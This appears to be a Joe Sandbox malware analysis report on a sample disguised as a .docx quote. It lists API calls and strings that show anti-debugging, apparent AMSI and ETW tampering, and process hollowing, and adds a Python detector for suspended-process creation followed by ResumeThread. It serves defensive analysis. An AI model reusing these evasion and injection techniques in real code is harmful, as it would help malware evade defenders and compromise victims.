                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
                                                                                                                                                    • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,029BAE35,00000000,029BAF11), ref: 029BADA9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2242398760-0
                                                                                                                                                  • Opcode ID: 3afef715b5bb5aaeeae8c1828f2d0459d9b8eb034400fd8e4a150862f63acc89
                                                                                                                                                  • Instruction ID: fdc2c96060f3dc00b29db035e058b68f5dbba70be0df2b451c321d70e2829b74
                                                                                                                                                  • Opcode Fuzzy Hash: 3afef715b5bb5aaeeae8c1828f2d0459d9b8eb034400fd8e4a150862f63acc89
                                                                                                                                                  • Instruction Fuzzy Hash: A0C08CA3712230178A3066F92D889D3978DCD8A2B730408A2F909E3102DB298C1292E0
                                                                                                                                                  APIs
                                                                                                                                                  • InetIsOffline.URL(00000000,00000000,029CB784,?,?,?,00000000,00000000), ref: 029BF801
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029BF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,029BFAEB,UacInitialize,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,Initialize), ref: 029BF6EE
                                                                                                                                                    • Part of subcall function 029BF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029BF700
                                                                                                                                                    • Part of subcall function 029BF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 029BF754
                                                                                                                                                    • Part of subcall function 029BF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029BF766
                                                                                                                                                    • Part of subcall function 029BF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029BF77D
                                                                                                                                                    • Part of subcall function 029A7E5C: GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                    • Part of subcall function 029AC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B1B8B8,?,029C0751,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession), ref: 029AC37B
                                                                                                                                                    • Part of subcall function 029BDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDAB
                                                                                                                                                    • Part of subcall function 029BDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDDB
                                                                                                                                                    • Part of subcall function 029BDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029BDDF0
                                                                                                                                                    • Part of subcall function 029BDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029BDE1C
                                                                                                                                                    • Part of subcall function 029BDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029BDE25
                                                                                                                                                    • Part of subcall function 029A7E80: GetFileAttributesA.KERNEL32(00000000,?,029C356F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,Initialize), ref: 029A7E8B
                                                                                                                                                    • Part of subcall function 029A8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,029C370D,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,Initialize,02A27380,029CB7B8,ScanString,02A27380,029CB7B8), ref: 029A8055
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                   • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                  • API String ID: 297057983-2644593349
                                                                                                                                                  • Opcode ID: 471510e126fde099da60994214ecbb01c6c2fed6545ce9c9807e0bb45836d915
                                                                                                                                                  • Instruction ID: 61fe7e75a3c7411ba952f3574679ebefcfdb7aafef796e3387350920b70da0ed
                                                                                                                                                  • Opcode Fuzzy Hash: 471510e126fde099da60994214ecbb01c6c2fed6545ce9c9807e0bb45836d915
                                                                                                                                                  • Instruction Fuzzy Hash: 5B142234A0025C8FDB11EB68DCA1ADE73BAFFC9704F6050F994099B654DB70AE568F81

                                                                                                                                                  Control-flow Graph

29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 ResumeThread call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 CloseHandle call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b8080 call 29b894c * 6 CloseHandle call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 4900->5216 5217 29c8ba2-29c8bb4 call 29b8730 4900->5217 5045->4780 5046->5045 5216->4689 5217->5216
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B1B7E0,02B1B824,OpenSession,02A27380,029CB7B8,UacScan,02A27380), ref: 029C86E9
                                                                                                                                                  • ResumeThread.KERNEL32(00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8), ref: 029C8D33
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380), ref: 029C8EB2
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A27380,029CB7B8,UacInitialize,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380), ref: 029C92A4
                                                                                                                                                    • Part of subcall function 029A7E5C: GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                    • Part of subcall function 029BDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDD5E), ref: 029BDCCB
                                                                                                                                                    • Part of subcall function 029BDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029BDD05
                                                                                                                                                    • Part of subcall function 029BDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029BDD32
                                                                                                                                                    • Part of subcall function 029BDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029BDD3B
                                                                                                                                                    • Part of subcall function 029B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029B83C2), ref: 029B83A4
                                                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,Initialize,02A27380,029CB7B8,00000000,00000000,00000000,ScanString,02A27380,029CB7B8), ref: 029CB2FA
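The API list above already contains the evidence for the process hollowing verdict: in the CreateProcessAsUserW call the seventh argument (dwCreationFlags) is 00000004, which is CREATE_SUSPENDED, and ResumeThread follows in the same function. The helper 029B894C resolves BCryptVerifySignature from bcrypt.dll by hand and then drops its module reference, which is the same resolve-and-FreeLibrary pattern as the other dynamic imports. The following script is an added example, not part of the Joe Sandbox report: it parses these report lines, decodes the creation flags for the CreateProcess* family from the Win32 prototypes, flags a CREATE_SUSPENDED create followed by ResumeThread, and pairs LoadLibrary*/GetProcAddress inside one helper to list the exports resolved at run time. The input lines are copied from the list above; the ApiCall type and the helper names are my own.

```python
"""Added example (not from the Joe Sandbox report): parse the report's APIs
list, decode CreateProcess* creation flags, flag the create-suspended ->
ResumeThread pattern and list LoadLibrary/GetProcAddress export resolution."""
import re
from dataclasses import dataclass
from typing import Optional

CREATE_SUSPENDED = 0x00000004

# 0-based position of dwCreationFlags in each CreateProcess* prototype; the
# sandbox prints arguments in call order, so the index maps straight onto it.
CREATION_FLAGS_INDEX = {
    "CreateProcessA": 5, "CreateProcessW": 5,
    "CreateProcessAsUserA": 6, "CreateProcessAsUserW": 6,
    "CreateProcessWithLogonW": 6, "CreateProcessWithTokenW": 4,
}

# Lines copied from the report's APIs list for the function at 29c8128.
API_LINES = """\
• Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B1B7E0,02B1B824,OpenSession,02A27380,029CB7B8,UacScan,02A27380), ref: 029C86E9
• ResumeThread.KERNEL32(00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8), ref: 029C8D33
• CloseHandle.KERNEL32(00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,00000000,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380), ref: 029C8EB2
• Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
• Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
• Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
• CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A27380,029CB7B8,UacInitialize,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,UacScan,02A27380), ref: 029C92A4
• ExitProcess.KERNEL32(00000000,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,Initialize,02A27380,029CB7B8,00000000,00000000,00000000,ScanString,02A27380,029CB7B8), ref: 029CB2FA
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # 8-hex-digit tokens become ints, everything else stays str
    ref: int              # address of the call site
    subcall: Optional[int]  # helper the call lives in, None for a direct call


def parse_api_lines(text: str) -> list:
    """Turn the report's bullet lines into ApiCall records; unparseable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        args = [int(a, 16) if HEX_RE.match(a) else a for a in raw]
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def creation_flags(call: ApiCall) -> Optional[int]:
    """dwCreationFlags of a CreateProcess* call, or None for anything else."""
    idx = CREATION_FLAGS_INDEX.get(call.api)
    if idx is None or idx >= len(call.args) or not isinstance(call.args[idx], int):
        return None
    return call.args[idx]


def find_suspended_create_then_resume(calls: list) -> list:
    """(create_ref, resume_ref) pairs: CreateProcess* with CREATE_SUSPENDED set,
    followed at a higher address in the same function by a ResumeThread variant."""
    direct = sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref)
    hits = []
    for i, c in enumerate(direct):
        flags = creation_flags(c)
        if flags is None or not flags & CREATE_SUSPENDED:
            continue
        for later in direct[i + 1:]:
            if later.api in ("ResumeThread", "NtResumeThread", "NtAlertResumeThread"):
                hits.append((c.ref, later.ref))
                break
    return hits


def resolved_exports(calls: list) -> list:
    """(dll, export, helper) for each LoadLibrary* whose next GetProcAddress sits in
    the same helper; these are imports hidden from the static import table."""
    by_scope = {}
    for c in sorted(calls, key=lambda c: c.ref):
        by_scope.setdefault(c.subcall, []).append(c)
    out = []
    for scope, seq in by_scope.items():
        pending_dll = None
        for c in seq:
            if c.api.startswith("LoadLibrary") and c.args and isinstance(c.args[0], str):
                pending_dll = c.args[0]
            elif c.api == "GetProcAddress" and pending_dll and len(c.args) > 1:
                out.append((pending_dll, str(c.args[1]), scope))
                pending_dll = None
    return out


def summarize(text: str) -> dict:
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "suspended_create_then_resume": find_suspended_create_then_resume(calls),
        "resolved_exports": resolved_exports(calls),
    }


if __name__ == "__main__":
    for key, value in summarize(API_LINES).items():
        print(key, value)
```

On the list above this reports the pair (029C86E9, 029C8D33) and the bcrypt/BCryptVerifySignature resolution inside 029B894C. The check only looks at the Win32 CreateProcess* family; a loader that goes straight to NtCreateUserProcess or NtCreateSection/NtMapViewOfSection (both names appear in this function's string list) would need the native prototypes added to CREATION_FLAGS_INDEX or a separate rule.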
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                                                  • Opcode ID: 769130b919238cb42d7054f3c966e83c3710b165044ab925bd159e636eccbf32
                                                                                                                                                  • Instruction ID: 7af64b9907690b4e5000a761f4d53a014ba13696d5c1957ad026490d79d013a5
                                                                                                                                                  • Opcode Fuzzy Hash: 769130b919238cb42d7054f3c966e83c3710b165044ab925bd159e636eccbf32
                                                                                                                                                  • Instruction Fuzzy Hash: 65431235A0021C8FDB11EB68DCA19DE73FAFFC8704F6050E9A4099B654DB70AE568F91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
control_flow_graph (node listing of the rendered graph collapsed; nodes 6966-9588 of the function starting at 29c3e12, listing cut off inside block 29ca513-29ca9ad). The entry block 29c3e12-29c5525 calls Sleep three times and reaches helpers 29bf094, 29be358, 29bdc8c (native NtCreateFile/NtWriteFile writer, see APIs above), 29be678, 29b7c10, 29b894c (twice) and 29bdc04 (seven times, once more in block 29c552b). Later blocks reach 29be398, 29a7acc, 29bf16c and 29bf108 (29c55ac-29c5d82); 29a7e5c, GetFileAttributesA (29c5d88-29c5dcd); 29b85bc (29c5dd3-29c66e5 and 29c7980); 29bdc8c again (29c66eb-29c6944); 29a36d0, 29a2f08, 29a7990 and 29a3700 (29c6949-29c706c); 29badf8 (29c7b11); 29b5aec, 29a4bcc and 29b7e50 (29c7e42-29c80f3); 29bb118 (29c80f8) and 29a3700 (29c8109-29c8120). From block 29c8318-29c8517 on, the graph shares the blocks of the function listed above: CreateProcessAsUserW at the end of 29c851d-29c86f0, 29bde50 and 29bd164 in 29c8880-29c8ba0, 29b8730 in 29c8ba2-29c8bb4, ResumeThread, CloseHandle, six calls of 29b894c and a second CloseHandle in 29c8bb9-29c92c0, then the repeated 29a46d4 / 29b89d0 pairs from 29c9cf5 onward. Edges: 6966 -> 7651, 7652; 7652 -> 7651; 7651 -> 7666; 7666 -> 7895, 7896; 7896 -> 7895, 7914; 7895 -> 8041, 8042; 7914 -> 8875, 8876; 8876 -> 8875; 8041 -> 8218, 8219; 8042 -> 8179 -> 8185 -> 8225 -> 8230 -> 8358 -> 8366 -> 8422 -> 8428; 8428 -> 8809, 8810; 8809 -> 8810; 8810 -> 9350 -> 9361; 8218 -> 8431, 8432; 8432 -> 8431; 8431 -> 8589, 8590; 8589 -> 8590; 8590 -> 9125, 9126; 9126 -> 9125; 9125 -> 9812; 8219 -> 8401, 8402; 8401 -> 8402, 8413; 8413 -> 8834, 8835; 8835 -> 8834; 8834 -> 8402; 8402 -> 9027 -> 9036 -> 9067 -> 9081 -> 9110 -> 9124 -> 9150 -> 9166 -> 9195 -> 9210 -> 9286 -> 9298 -> 9527 -> 9533 -> 9546 -> 9550 -> 9563 -> 9569 -> 9581 -> 9588.
